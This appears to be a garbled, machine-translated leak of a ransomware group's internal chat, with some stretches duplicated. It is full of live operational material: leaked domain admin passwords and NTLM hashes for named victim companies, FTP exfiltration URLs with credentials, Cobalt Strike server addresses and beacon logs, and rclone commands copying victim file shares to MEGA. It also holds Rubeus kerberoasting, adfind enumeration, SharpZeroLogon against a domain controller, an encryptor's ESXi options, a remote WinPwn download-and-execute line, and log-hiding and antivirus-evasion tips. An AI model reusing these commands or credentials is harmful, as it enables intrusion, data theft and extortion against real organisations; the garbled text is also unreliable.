`FORMAT user hash
```
MD5 aperia 4c1874760fb49ebdabadd6cc4232ed7b1
NTLM miriam 669bfafdb4990fe1c953f8ac5a15586d
SHA1 luke 8a233d0252d2c659b3a26cf4cf25d59d409615ab
```
And here's the kicker - it's DCC2 (I fucked them!)
`$DCC2$10240#techpilonm#a056cd163d1edf16d4827d2b0dd5945a:%TGB4rfv`
Here are the speed stats:
```
MD5 80696.7 MH/s [ 84616622899 tries/sec ]
Sha1 26210.2 MH/s
NTLM 134.0 GH/s
DCC2 1044.4 kH/s
BitcoinWallet 17111 H/s [ 17111 attempts/sec ]
```
If I still have to chase that config does not brute force something because again MD5, I think it's a shame.
***
[serviceman's voice](https://hashes.com/en/tools/hash_identifier)
Go in, check it out, throw.... Ah site is also provided with their database piercing service...
([Decrypt](https://hashes.com/en/decrypt/hash) like to call it)
_here's more
`https://crackstation.net/`
`https://md5decrypt.net/en/Ntlm/`
`https://md5decrypt.net/en/`
`https://md5hashing.net/hash`
`https://www.cmd5.org/`
[Cloudtopolis - if you want to fuck with me](https://github.com/JoelGMSec/Cloudtopolis)
So # ATTENTION !!!
`FORMAT user hash`
cpPudgesubzerojaxtesttest_uploadbarakaSaulGoodmanpopulyaet rolled back the OS ne terayte skoro buduu I do not have big trabla in ls sent@all hello all, who has an image of Windows 7? Pudgesubzeromango me to go away for 1-2 hours and will until morningfiksanempisyat for now fix files via sendspacevampirvampir. All in all good, just restoring all the data. My computer fucked up, I'm transferring everything to a new one. It should be ready in the morning. Anything to do? Hi, how are you? I'm joining you,
Happy New Year to all, all and more in the New Year and less trouble!) Happy holidays to you, men!
Let everything go as planned)Happy Holidays to all! May our wishes come true!!! Happy New Year to all, may the next year make all expectations come true✊🏼Welcome greetings!!! May things get better in the new year. A firm handshake! +++ Happy New Year )Happy New Year, men:innocent:Happy New Year to you all, Bro!!!:snowman2:Happy New Year to all, we will find you in the new year :)@all Hey there! Happy New Year to all! Who gets my salary - write to me in person :) https://xakep.ru/2021/06/25/windows-ad-book/SaulGoodman
``OK``.
DO NOT TAKE IT
``````
GUYS ON THE LOKO, KNOCK IT OFF THIS NETWORK
+ tvin here ?let me see @steven how much did you download ?@steven give me the build here for 24 hours alreadywww.ausol.com.ar_TEAM_Сага when you download I will give you the buildSo let's do it now and then we will locate the downloaded data you did not see ?@steven give me the build here plizsens``
ftp://ausol:Fig8ubff7CfuhyvGTkBfhaIfMxkDCY@23.82.140.100/uploads/
``I just did not try from that one did not want to take off? I see that I took off the computer or something? Thank you)), all domain adminsuol.corp\avillaverde ViniciuS2020$
ausol.corp\avillaverde 4873e655be8862d3ed5dcc70151cb364
ausol.corp\lrobles 90e7db2933e66dc4dff8a41a01d33725
ausol.corp\rodrigo 02a1b246ba950ceabaa929b7b6da783e
ausol.corp\admbck 79baf62189eb6b6c1a680a8b7c276419
ausol.corp\timesync 79baf62189eb6b6c1a680a8b8b7c276419 just in casewww.ausol.com.arausol.corp\avillaverde ViniciuS2020$444 or 556COBA://209.222.101.242:64132
P4C3aATy1mkUlTkTvOhTDwFl2SoRwFUoSMm give dsotupes in coba and pid@steven sessions pulled up, caught up in the language barrier, here spanish, balls do not take off, suggestion. no problem, now rename the channeldomain ausol.corphttps://www.zoominfo.com/c/autopistas-del-sol-sa/372403861 if anything jumped ?he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little bit of a problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server, he had a little problem with the server... he had a little problem with the server, he had a little problem with the server....
# Fellas on the net www.ausol.com.ar_TEAM_C don't touch it in hell fill me up for the date ransom
``and fuck, maybe the cookie is just dead,`` it's not like it's in the hash, sonic, when you authenticate by hash, what do you put in the url instead of ``welcome``?
i don't want to run dirbasterom does not helprname my vg to domain? he means write the domain on the machine from which you are connecting and how do i put it in the domain if it does not connect to vpn? i put the virtual in the domain as they have, there check for domain remember please how to work around EPC check sonic?he problem is that he netifikat generates ssl 3 and everything will go in the settings of the Internet explorer ssl should psotavit if we solve the problem - tell you how to solve it does not help) yes, I have this often, strangely enough for me to press edit connection helps, Remember the login to ipn account, then click ok and enter the password - will connect + is also often the same error Credential or SSLVPN configuration is wrong, the error code -7200 from the nix client openfortivpn all ok, but with the Windows I can not come in, what could be the problem?i got a -7200 error on fortivpn with valid credentials? it's probably just a dead cookie. i don't know if it's a hash error or not, but i can't log in with a hash error.
i don't want to run dirbasterom does not helprname wg to domain? he means write the domain on the machine you are connecting from and how do i put it in the domain if i can't connect to wpn? i put the virtual in the domain like they have, there is a check for the domain, please remember how to work around the EPC check on sonic?i saw only webcloud and by default disconnect via 2fa code in lokalek not deplauded in lokalek or only by web in claud sendinel one? @all who worked with sentinel one console? i dont use mega client) and event triggers are the same (if configured), the main thing is that i dont detect signature on it is the same as with the desktop mega client i think on that why?
in larder cortices this thing will be stolen, right? can be immediately improved) it was originally installed through the rdp, from the user. and to work through the coba, from systems, the rclone must point to config C:\Users\user\.config\rclone\rclone.conf
and i still can not find the path. i tried to mount a disk, but it did not work. that's how it is with me) only if the session from the admin open through the rdp, then it will only be happyxm
I've tried to open a session with an admin. when using it write if something is missing in the functionality, finalize it)tried it, normal tool) thank you really now on the rdp do not need to get into the cool, thank you is generally convenient, immediately after the ball put all the fs to skaii and went to do things) normal stuff should look only I have through the koba did not get something to copya))))) heh heh
okay
it means colleagues work with it, ok) we are also in business then)articles about it just started to use it as I understand it```
Egregor RaaS Continues the Chaos with Cobalt Strike and Rclone
``Is the http protocol on any port in the process? how is it visible/not visible in the system after installing what protocol? in 50 minutes 10gb download do it for coba) https://github.com/rclone/гсІопевот more a guide on it
Hi all! Those who download files and everyone will find it useful! Very cool thing, RCLONE
now there is no need to unzip mega files! everything is very quiet and unnoticeable!
I do not know how to describe it)
download rclon from the off-site. rclon.exe put it in the folder you need, then follow the manual.
clone everything you need. everything is downloaded via the clone, so the download speed is high.
Here's the guide. It's simple
https://rclone.org/mega/
next command to download
rclone.exe copy "\\FS\" remote:NT -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
remote:NT - change only this.
"remote" is the name of your mega.
"NT" is your directory in the mega where it will be downloaded to, if it doesn't exist, it will create it itself.
example
rclone.exe copy "\\trucamtldc01\E$\Data" remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
Happy Christmas Eve to everybody! :)Happy New Year to all !!! Happy New Year to all !!!) :partying_face: :tada:Happy Holidays to all)Happy New Year !!! :champagne_glass:``
I JOIN IN WISHING A HAPPY NEW YEAR !!!! HURRAH HURRAH HURRAH !!!!!!
```:champagne:Happy New Year !!! URA - URA - UURRRRR! Happy New Year to all the guys:raised_hands:Happy New Year to all, the main thing is health! Happy Holidays to all!!! Happy Holidays to everybody! :pray:I join in congratulations! All with a holiday! I wish everyone in the next year to progress up as much as possible and respectively, the maximum profit!!! Hello to all! Happy Holidays! All the best wishes in the new year! Happy New Year to everybody!) Happy New Year to everybody!!! :) Happy New Year, gentlemen! :snowman:Happy New Year guys! All the success, health and good luck in the new year! Same to you!)) Happy New Year! :fireworks::partying_face:Happy New Year to All!!! :wink: :handshake::champagne:Friends, I want to wish everyone a Happy New Year.
We did a very good job this autumn. All, both beginners and more experienced members of working groups have grown professionally, those who lacked diligence or technical background left us naturally, let's wish them only success in other endeavors.
All those who have gone through difficulties of mastering new tasks are with us next year, and, I am sure, will continue to evolve by learning new things and expanding the horizons of perception = )
With each passing month turnover and quality of work only grows. I am sure that 2021 will be a landmark year :-) After the holidays we will have small changes and improvements, but none of them will be disputable.
Well done, everybody. Thank you all! Who has this case? Check the vm list on esxi before the lock to be sure, you can do it with a command (esxi shells):
vim-cmd vmsvc/getallvms``````
Parameters to start the unix version
--path
If this parameter is used, the locker will encrypt files at the specified path. This parameter is obligatory, without it the locker won't encrypt anything.
./encryptor --path /path
--prockiller
Kills all processes which interfere with opening files.
./encryptor --path /path --prockiller
--log
Enables logging of all actions and errors
./encryptor --path /path --log /root/log.txt
--vmkiller(For esxi only)
Turns off all virtual machines
--vmlist(For esxi only)
Sets a file with a list of virtual machines that should not be shut down. One line for each VM
./encryptor --path /path --vmkiller --vmlist /tmp/list.txt
--detach
Disconnects the process from the terminal.
So that if an ssh session crashes, the locker will keep working
And the files won't get corrupted.
ESXi version SHOULD BE REQUIRED separately
If it doesn't start somewhere, I need os, kernel version and glibc version
/lib64/libc.so.6
``webroot stalls dllinject from cobalt
on the balloon sticks? who has tested in the last 2-4 weeks? pour them a full listingamy 30 percent give only listingamy they have only one balloon on the balls of course from different or from different? all from one server downloaded?i'll upload and i can't get into the admin panel, i can't get into the admin panel, i can't get into the torus, it's laggingmayakki like i asked them to choose 2 files, not leoni they asked for a folder, listing sent a note, kids, there are still pc's schmiffed. bye myself sitprivet and wish you Happy Holidays and Merry Christmas ! :))) I'm in touch, write me when there's something. Hi. Hi, I'll be giving out tasks, what are the tasks for today?all hellojeremytonylexmanternert3chnologhelloworld123 kerberoast attack via vpn - hash removal with a kred` ``Rubeus.exe kerberoast /creduser:domain.int\sdestin /credpassword:Akeelah$14 /domain:domain.int /dc:10.254.0.20 /outfile:c:\programdata\IntelGX.log /format:hashcat
``--------- work of the adfynd through the vpn
in -h ipac dc pdc
then domain
+ account valid from AD ``adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=person)" > ad_users.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "objectcategory=computer" > ad_computers.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=organizationalUnit)" > ad_ous.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -sc trustdmp > trustdmp.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -subnets -f (objectCategory=subnet) > subnets.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -f "(objectcategory=group)" > ad_group.txt
adfind.exe -h 10.254.0.20 -b dc=ADdomain,dc=int -u ADdomain.int\sdestin -up Akeelah$14 -gcb -sc trustdmp > trustdmp.txtda all normal already figured outprivet from what?Hello Sorry, overslept a little, bring me up to speed all pivetday at 77? tomorrow at the lockWhat time is the assembly of the MSC? if it will lock you then what will you do?You'll have to transfer it to the other one via the dedicator first, then to the other mega at 8-9 tonight... or were they on the mega you fucked up? there's a lot of data there or not if we finish the milk tomorrow we can let it go under the knife tomorrow to pump milk or start pumping conextoga\which network is better to take tomorrow:wave:hello hellohelo maza faka:zany_face:hellohadn't been there for 2 days, now in normal modewill report back to you soon I will wait for the distribution tomorrow morning mimilk finish and nothing on the locker is not ready hostrubrandon already pumpingdeads ready?i'm here i was out of light who's online? and by 9 no one what's the point of gathering everyone at 8 am + i'm in place, waiting for the deadlocks will be ready for tomorrow morning ask me please, deadlocks ready for delivery? steve hello! wait i just came over there are two networks, i'll take a look Steve, you have something interesting? i saw twin's coba, the network i gave you in pt is still dead.
i think it will be ready by tomorrow halfway through tomorrow maybe even today is there a session from netfinish?
all three of them will be done by the end of the week for sure.
there's 240 cars on the AD
but at the same time 60+ servakovmne tooada, now there will be a couple of vpnchik) have a job? sit without delahm, skin in a leech plzrode not with the old connectsHi all, the password from the coba tween changed? m? I looked there in general even something of mine there was )masonzvhhitechTyrVanoa all foundPlease share registration key to proxyfaerpeace question who online?
help for trustsanyone give sharpshooter a master key to collect passwords
if so tell me how to check a quick one-tool just
no dirt, or just open a coboy somewhere with an active session@all give me please socks5 any usa working))) need it urgently and do not have access at hand, just tunnels[ ](https://stylebrooks.com/group/general?msg=ui2m2k6N3xkyWqfAX) and look at ``
net view \\host /all
`oko? I'll see `net view is a handy thing, I mean, who is exploring spheres/servers, via shell dir, file browser or rdp? maybe even more convenient ways there? net view please@all brothers, write in ls besides charfinder who uses what method to find goodies?thank you exactly://www.ostpstviewer.com/парни hello all. stole mail ost. can not find how to read. was some kind of site. who knows ?
I'll look)+@alter do not know about the others, I do not have the right to change the passwordWe strongly recommend that you check your machines for possible bookmarks, change passwords to this and other rockets too, until the weekend do a little internal securiti audit as time will be@all Considering that many ask this question in light of recent news about the Ministry of Health of Ireland. I want to say that no one here has anything to do with this attack, we are NOT attacking gov resources, hospitals, airports or anything like that, and we won't.I'm heretout@all who's online? need to take a bot from vnts crapshot thankshttp://github.com/ferreirasc/scripts/blobs/27bb7f7f423efa6e9820ff4a9e2624b719978acbc2/SharpPrintNightmareexesharpPrintNighmare have you got it knocked down?)) change the coboo they start it to "interfere" you or what I z) your sample got to AV so it should already be in the blbl should scan the botyn what do I delete?))) me gasket) I can only remove the sheetscannered it looks like ``08/26 18:15:25 *** initial beacon from Lily.Winterfeldt@10.125.205.231 (SRVMDKHQN600KUH)
08/26 18:15:25 *** initial beacon from MFornell@172.24.36.6 (Dev-j64HtrrR0v)
08/26 18:15:25 *** initial beacon from PHeimer@172.22.26.173 (SRVYs7hW)
08/26 18:15:25 *** initial beacon from GodertC@192.168.221.120 (lWrzijLoyG)
``hanypots probably to be exact900 bots just show me a couple of lines show me the logs continue:D about a hundred bots came to the coba what newsletter? did someone do a newsletter now? so? without a hook trying to run a hike tried the coba 4.tried koba 4.2 without the hook? tried koba 4.2 without the hook and got the same thing, wrong authorization file, I don't know what the heck is up
today should turn on hello, I'm not busy yet, waiting for when steve in the group is free may need someone to help with the case? thank` ``
Vampir
DHJ7i!%td6sg1%&^FDRa
https://simonty.com/
``Hi, me too register on the forum plz? Long buksuyu with the case`` ``
lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBUYzrXMj
```
I'll try again, no reshooting, just no new sessions.i have a key logger that works? i'll look at it, i'll look at it. i need their data on the deck. let's give them a full listing. they only have a listing for 30%. they only have one listing. of course, all from one server. hey, can someone share his account on xaker.ru? happy New Year !!!!!! Be happy:raised_hands:Soedeneyatsya to congratulations! Team! :wink:Thank you ! Likewise!
Happy New Year to all the guys !!!
I see what you're thinking.
thanks a lot shortly as on the router you enter the same way on the web and on Fortik for example 192.168.0.1 as a rule there) see the gateway is a hardware solution everything got it thanks, got it)
how to find fortik admin?
it is on one of the servers should be? for example per thread max 500kb, i download 10 threads at once i.e. the same file is downloading at 5000kb/snooo no fortik have admin area, you need to go there and turn off firewall rules, i also have no case with fortik everywhere restrictions and traffic jams, is it necessary to get it through saba? have access to fortik admin area? yesfortik only downloads archives, but it's really slow what can block downloading on server?
on the host no avera, rklon and mega download gets up at the very beginning.by ipi seems to needa if just by hostname? ``beacon> shell ping ETLHODOPR01.etlife.com
[*] Tasked beacon to run: ping ETLHODOPR01.etlife.com
[+] host called home, sent: 58 bytes
[+] received output:
Exchanging packets with ETLHODOPR01.etlife.com [10.160.1.68] with 32 data bytes:
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=188ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125
Response from 10.160.1.68: number of bytes=32 time=187ms TTL=125
Ping statistics for 10.160.1.68:
Packets: sent = 4, received = 4, lost = 0
(0% loss)
Approximate time of reception-transmission in ms:
Minimum = 187msec, Maximum = 188msec, Average = 187msec
beacon> execute-assembly C:\soft\SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset
[*] Tasked beacon to run .NET program: SharpZeroLogon.exe ETLHODOPR01.etlife.com -reset
[+] host called home, sent: 114277 bytes
[+] received output:
Performing authentication attempts...
[+] received output:
Unable to complete server challenge. Possible invalid name or network issues?
``Yes, it's pinging DC ?``execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com -reset
``````execute-assembly C:\soft\SharpZeroLogon.exe ETLHODODR01.etlife.com
``Show how you start, but the target name is exactly right``Unable to complete server challenge. Possible invalid name or network issues?
Kot'nt know why zerologon writes not the first time in different networks such fuckin' bullshit, of courseyou have the same versions of coba and timeserver? if constantly a bug, then deal with it is not systematicTill you find it easier to take a new dazh, many dependencies, from the coba, to hosterne met this shit?but it sometimes works, mbe it's still possible to ozhvit)) and not kobanu dedik, it's a fact)so mbe dedikon fuckin, not koba?) sure, you can change the dedikon, but I want to fix it)if it is easy and no problems in other machines not in koba then it's the network not terrible comments and creeds fly but I easily and without problems open beacon other machines do reset long enough koba is not cluttered by itself? does it take a long time to load when you connect to a coba? does a bare ppl like ekse behave the same? and in all networks this shit? maybe someone has faced and beat this shitopen beacon on the deck, and there is nothing, enter commands - no reactionA more? what do you mean beacon stops working? hello everyone, can anyone tell me how you can beat the shitty response from the dedicator to the tem server, beacon stops working oftenRklon is also convenient to take a listing of files from the fs, to study before downloading, quickly makes
```
rclone lsl "D:" >> C:\listing.txt
``[ ](https://stylebrooks.com/group/general?msg=bEwLBjZpFRkjLMvbT) this command won't show the folders in a megabyte, for example, or on cftp[ ](https://stylebrooks.com/group/general?msg=73N4hKedEtTrFYPZz) how is it different from shell dir /s /b /o:n /ad ?appreciate, thanks maybe somebody will be interested - rclone can list the folders on the server
``rclone ls remote:path # lists a re
``or just zip it up is it realistic to write a cna that would put an option in the coba in the file manager to zip a folder and immediately download it? that was fucked with tm I remember, I wondered how he troilis through it ok ?
webroot ?
simantec ? TM ?cisco edr, falcon, eset, sofosi in our experience that meet our cobalt injector which is not that fuckin@all give me a list of avers where our shellcode injector does not start conti normally[ ](https://stylebrooks.com/group/general?msg=n2Wre72jLwCfktF2J) change the config
wusa.exe > rundll32.exe
change the config will be enough gmer or an analogue that kills processes, but it's in emergencies, and sometimes it swears at them guys, who killed the webroot on the pass? I don't think it's the antivirus. It's not allowing you to crash the binary to the specified path. You have to change the path and name of the executable in the profile.
[-] Could not connect to pipe: 2
No, I want to test one tool on a carbon, but I haven't tried it. Would you like to set it up?
if you meet them, you'll understand what i mean)@t3chnolog what kind of antiviruses are they?)))@all a minute of attention
who have in work cases with evil antiviruses like cilance/crowdstrike/firewire/carbon and have admin rights on at least one host - write to pmoffline_winpwn.ps1 for machines without internet access - use commands from manual after importing ``Import-Module .\WinPwn.ps1
```
or
``iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
``That's the same way you looked at it in the transfer list``.
lssyxxenLocq7m2IhQJIDmkmiW2b8eh5o4VSkXcgf4Ge03KIybJV8rFLBYzrXMj
```
find out who's id? mmm? kk```https://www.zoominfo.com/c/arrow-material-services/355399602
7 Servers 0 Works
ftp://EPFSOpItzNwIpTzaB6d:gYjW79f9VZ20l2fjItXBaMOtNyJQMD@23.82.140.100
Arrow Material Services is a leading provider of logistics, handling, terminal operations....
Revenue: $51 Million
Locker: Conti
Works: Fury,Steven,Sonar
Kk write the report, Fury started to localize there? PART
``Ping request could not find host arrow-nb204.AMS.local. Please check the name and try again.
Ping request could not find host arrow-dt219.AMS.local. Please check the name and try again.
Ping request could not find host arrow-dt218.AMS.local. Please check the name and try again.
Ping request could not find host arrow-nb224.AMS.local. Please check the name and try again.
Ping request could not find host ARROW-NB216.AMS.local. Please check the name and try again.
Pinging arrow-nb231.AMS.local [10.2.7.5] with 32 bytes of data:
Reply from 10.2.4.61: Destination host unreachable.
``And it's like all the winks are off-line'' PING SERV
10.2.4.62
10.2.4.64
10.2.4.63
10.2.4.79
10.0.168.3
10.0.168.1
10.0.168.2
``Okay today at 7 am loc@alter here we need to build@fury balloons again and we can close them good goody goody goody, wait for steven and put them on download, we'll close them tomorrow`` ``information for download
\AMS-HYPERV01.AMS.local\D$\Hyper-V\Virtual Hard Disks
\AMS-FS01.AMS.local\d$\Backup\jengel\Documents
\AMS-FS01.AMS.local\d$\Company Shared Files
\\AMS-FS01.AMS.local\d$\Documents
\ams-sndb01.AMS.local\e$\MSSQL2017Backup
``Knszczas 20-30 minutes and I'll give the serverszczas try to pour on ftpparni on the mega so far not lieutenants, go look at the balls , and put on the pump , here's the mega. It's paid for, the Confurm is still going on.
``laposberrrg@outlook.com
KJDBu2bd&*@*&@(*YU@IOnxlknx
``Kk after tomorrow we'll put them up for uploadsGreat8serv 28 workthere are so many servers. I'll go to the balls to see what to download while the GAS is scanning.``AMS\amsadmin @rr0wM@t3r1@ls
I'll try the balls with tool chain1092 I'll take the balls off and pull them apart I'll pull the comp up what are you guys doing there?i have pulled my grandfather, now we are going to take off the hellsonar, please release it all rebooted all rebooted me batinkok i have not rebooted yet i need to take off the ad green marking i have pulled the grandfather) majikkk, now i will do it myself. i got kicked out of the rip from my own rodeo, but there is a ripconnected and i can not connect to your rodeo, pull the bot via speedtestock command, but apparently copied it wrong - does not go ``COBA://172.96.143.178:40610
sDBkQSRs9oW7Q7Q8rgydk40J9kVbdThQXeJ1P
``I tapped into this coba
COBA://192.254.79.154:35752
GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqt wait for which coba to enter in the end? all sorted out jdk reinstalled and everything worked )kkda sec I have something coba now I will figure it out....
GpleevXlouzccVl9FJ8U9Tdivc1sfjyGqtnishtyak, now I will find out which kba work? I have the first 2 minutes on the cracks already workingahead, but I immediately kicked out, so someone is working on them. will have to try early in the morningokdate will try to raise so, look, there are cracks in the WHOH Hi) all welcome @Fury take the guys and jumpahead ... ) all the same sessions to reshoot kobyda no matter what I do not about it)I have 4.2 kobaya did not download) hey hey, have anything to do? or all already downloaded?[ ](https://stylebrooks.com/group/general?msg=t7M8HyCrrotTqF558) datsnet domainremen remind pliz in the meter to check the local account instead of the domain . put?[ ](https://stylebrooks.com/group/general?msg=J4NsNkEYgthib8Kko) correctly understand that these parameters disable the log? and why not wireguard? he same faster and more vanilla[ ](https://stylebrooks.com/group/general?msg=idNukopPfPaJR3jg6) this is a good manual, and if you sign servers on the VPN server - think what happens when you compromise the VPN server) when you compromise the certification server, you can listen to the trafficThanks, I did not know, very interesting) center - server = one and the same. but i did not know that you can isolate it. it's funnytut detailedhttp://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-18-04-гцне server and the center, certificates you can sign at your[ ](https://stylebrooks.com/group/general?msg=GqosiGAtzTmJAy588) do not forget in the configuration of the server.conf
add ``verb 0
log /dev/null
status /dev/null
log-append /dev/null ``[ ](https://stylebrooks.com/group/general?msg=ufzwpLDEwcmHPSFWq) you either have the wrong expression, or I do not know how it will be the certification server on the local machine? may be just do not store the keys on the server, do not install certification centers on the server itself, do it on the local machine....[ ](https://stylebrooks.com/group/general?msg=4Jv3QiMbBJivNTi89) https://github.com/Nyr/openvpn-іпѕтаІІраскопаю vpn script if you use publick vpn then only on the output, before it you should be all rightset your vpn servers on different hostings on what to transfer?interpol - cyberbez))))[ ](https://stylebrooks.com/group/general?msg=q3jqLDMS36ng2P3Zo) of course competitorsbylvrp service what was doublevpn ? competitors ? and what about doublevpn ? can be crypto dll coba and through the session pull out with mimicatak from admin and doa local admin rights are there ? hysterics((need to know if the av screams when dumping through the task manager Hello all ! :handshake:
Guys, how can lsass be dumped with AV Microsecurity on board?:face_with_monocle:+When AV shouts no, he means yes)) very much swearing, but let it pass ehhetak also with makaffy was, earth to his soul)))) shortly everything you need to know about modern antiviruses could not beat the trend micro, let ekse, he gives a fuckPlease can someone bicon crypt?remind me how you can steal chrome cookies in JSON format from a cobalt session.
Remind me before there was CIP telephony with forums - I forgot their name / contact@all Friends, you write to me periodically with different technical problems of different complexity, to write a script, to correct a splot, to test something in closed mode, to correct a ready-made script on the git, and so on.
I want to remind you that we have a full-fledged development department for such tasks, where responsible persons will be assigned, but only if you yourself will provide full-fledged testing of the ordered product and share it with your colleagues. Please take this carefully and responsibly, if you have requests for such - write to me in PM what you need to write / to correct / to complete and so on@all sicaf-cosmetiques.fr again lost the owner and the confab is not!!! URGENT! need info1. scan for vulnerabilities or watch the update poke to understand the fix is rolled or not.
2. Paleoad is needed, create a job and lift through it (i can be wrong let them correct)
3. Saw the manual cool from Ragnarek there was this 1 How well it works on the patched 2008?
2 Is it necessary to start a session in msf or is it necessary to tunnel through proxy in Cobalt?
3 Maybe there is a simple manual?
Please share your experiences who worked with Exploit EternalBlue in MSF ...? Whose? I understand, thanksgreatest thing is that 90% of the time 1 naprol to everything) also in the software can be IT folder with passwords, but also they can be passwords in excels found on the desktop and in the docks, called passwords) Once these same excels found in van drive authorized in the mail bodyHi all. Podskazh please, where can I find the Credits from Datto? Viam, orbs, cypress, chrome is understandable. Any other options, where they are most often stored? Maybe some way out of the clients can?[ ](https://stylebrooks.com/group/general?msg=ynnSjY62yQAhZMDoG) cps, added to the notes `execute-assembly /root/Desktop/TOOLS/bloodhound_master/BloodHound_master/Ingestors/SharpHound.exe --CollectionMethod All --Domain lab.com --Stealth --excludedomaincontrollers --windowsonly --OutputDirectory C:\programdata\ guys can I add to the confab about tool chain? you shoot sharphound, you drop it into bloodhound -profite in two words who can explain how bloodhound start using?[ ](https://stylebrooks.com/group/general?msg=TXftyYQdkvMqd6B9X) resolved through the replacement
wusa.exe
to
rundll32.exe[ ](https://stylebrooks.com/group/general?msg=4SXBDzeGnxSzwguH4) do you need to connect as local admin? or enable local admin service?
jhmW6WXkvsAwheK2P5XiR8Cm7k6dYgnFAcD8y6ONiZBZbEQIUFk1gVjdnpSwqHDq
```
look whoseHello, everyone.
If anyone has debugged CVE-2021-21985 for vCenter, post a PM, please.@Chuck there is a .txt variant, it went better for meHello, does anyone have a video on MS17? hello, tell me hosting for Іncxp guys proxy adfind as app and go to proxyfind add``.
adfind.exe -h 10.80.9.5 -u domain\user -up p@$w0rd -f "objectcategory=person" > ad_person.txt
As an option, specify the IP address of the domain controller and try to build ad_person via sockets.
beacon> execute-assembly /home/user/soft/ActiveDirectory/adfind/AdFind.exe
[-] execute-assembly error: max upload size is 1MB
``Of course lol, AV already bans legitimate tools because their hack groups use them lol (I mean the adfind itself) I haven't tried it, but I wonder if it'll work
they use winapi there, i think it's written in sycharp, try to do it via execute-assembly or an alternative way to remove the adfind where there's an ab that breaks the adfind, like sofos?msg=t7M8HyCrrotTqF558) datunset domainremind me please, in the mete to check the local account instead of the domain . put[ ](https://stylebrooks.com/group/general?msg=J4NsNkEYgthib8Kko) correctly understand that these parameters disable logs? and why not wireguard? it is faster and more vanilla[ ](https://stylebrooks.com/group/general?msg=idNukopPfPaJR3jg6) this is a good manual, and if you sign servers on the VPN server - think what happens when you compromise the VPN server) when you compromise the certification server, you can listen to the trafficThanks, I did not know, very interesting) center - server = one and the same. but i did not know that you can isolate it. it's funnytut detailedhttp://www.digitalocean.com/community/tutorials/how-to-set-up-an-openvpn-server-on-ubuntu-18-04-гцне server and the center, certificates you can sign at your[ ](https://stylebrooks.com/group/general?msg=GqosiGAtzTmJAy588) do not forget in the configuration of the server.conf
add ``verb 0
log /dev/null
status /dev/null
log-append /dev/null ``[ ](https://stylebrooks.com/group/general?msg=ufzwpLDEwcmHPSFWq) you either have the wrong expression, or I do not know how it will be the certification server on the local machine? may be just do not store the keys on the server, do not install certification centers on the server itself, do it on the local machine....[ ](https://stylebrooks.com/group/general?msg=4Jv3QiMbBJivNTi89) https://github.com/Nyr/openvpn-іпѕтаІІраскопаю vpn script if you use publick vpn then only on the output, before it you should be all rightset your vpn servers on different hostings on what to transfer?interpol - cyberbez))))[ ](https://stylebrooks.com/group/general?msg=q3jqLDMS36ng2P3Zo) of course competitorsbylvrp service what was doublevpn ? competitors ? and what about doublevpn ? can be crypto dll coba and through the session pull out with mimicatak from admin and doa local admin rights are there ? hysterics((need to know if the av screams when dumping through the task manager Hello all ! :handshake:
Guys, how can lsass be dumped with AV Microsecurity on board?:face_with_monocle:+When AV shouts no, he means yes)) very much swearing, but let it pass ehhetak also with makaffy was, earth to his soul)))) shortly everything you need to know about modern antiviruses could not beat the trend micro, let ekse, he gives a fuckPlease can someone bicon crypt?remind me how you can steal chrome cookies in JSON format from a cobalt session.
Remind me before there was CIP telephony with forums - I forgot their name / contact@all Friends, you write to me periodically with different technical problems of different complexity, to write a script, to correct a splot, to test something in closed mode, to correct a ready-made script on the git, and so on.
I want to remind you that we have a full-fledged development department for such tasks, where responsible persons will be assigned, but only if you yourself will provide full-fledged testing of the ordered product and share it with your colleagues. Please take this carefully and responsibly, if you have requests for such - write to me in PM what you need to write / to correct / to complete and so on@all sicaf-cosmetiques.fr again lost the owner and the confab is not!!! URGENT! need info1. scan for vulnerabilities or watch the update poke to understand the fix is rolled or not.
2. Paleoad is needed, create a job and lift through it (i can be wrong let them correct)
3. Saw the manual cool from Ragnarek there was this 1 How well it works on the patched 2008?
2 Is it necessary to start a session in msf or is it necessary to tunnel through proxy in Cobalt?
3 Maybe there is a simple manual?
